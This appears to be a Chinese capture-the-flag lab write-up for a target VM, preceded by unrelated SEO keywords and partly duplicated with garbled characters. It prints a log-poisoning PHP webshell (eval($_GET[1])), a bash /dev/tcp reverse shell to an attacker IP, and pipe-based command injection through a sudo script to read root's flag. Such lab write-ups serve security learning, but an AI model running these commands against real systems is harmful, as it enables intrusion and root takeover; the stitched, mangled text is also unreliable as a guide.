河北省城乡住房建设厅网站,app拉新渠道,针对不同网站的cdn加速,好看的企业网站环境搭建
环境下载
靶机和攻击机网络适配都选 NAT 即可。
信息收集
主机扫描 两个端口#xff0c;22 和 80#xff0c;且 apache httpd 2.4.0~2.4.29 存在换行解析漏洞。 Apache HTTPD是一款HTTP服务器#xff0c;它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中…环境搭建
环境下载
靶机和攻击机网络适配都选 NAT 即可。
信息收集
主机扫描 两个端口22 和 80且 apache httpd 2.4.0~2.4.29 存在换行解析漏洞。 Apache HTTPD是一款HTTP服务器它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞在解析PHP时1.php\x0A将被按照PHP后缀进行解析导致绕过一些服务器的安全策略。 来自https://vulhub.org/#/environments/httpd/CVE-2017-15715/ 测了半天除了一个文件包含也没发现特别的东西看了大佬的 wp 用 seclists 字典中的 LFI 字典跑一下。
就可以发现一个特殊的文件ssh 的日志
getshell
ssh 连接一下靶机curl ip/var/log/auth.logssh 日志已经写入。 这边利用 ssh 登录产生错误日志写入一句话木马。
访问执行命令。 这反弹有点迷这样就能弹出来直接 bash … 弹不出来。
echo bash -i /dev/tcp/192.168.29.129/9999 01|bash有个 py 文件cat 了下直接卡主还是在页面上看吧里面是一堆加密后的代码。 提权
sudo -l 发现 xxxlogauditorxxx.py 可以以 root 运行。 先开个终端
python -c import pty;pty.spawn(/bin/bash);然后如下就可以以 root 权限运行。
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoamiflag
复制 root 目录下的 flag 到网站中下载下来解码。
/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.pngwp
https://blog.csdn.net/weixin_34220834/article/details/88772835总结
本地文件包含利用 ssh 登录产生错误日志写入一句话木马
ssh ?php eval($_GET[1]);?ip
seclists 字典https://github.com/danielmiessler/SecLists
sudo -l
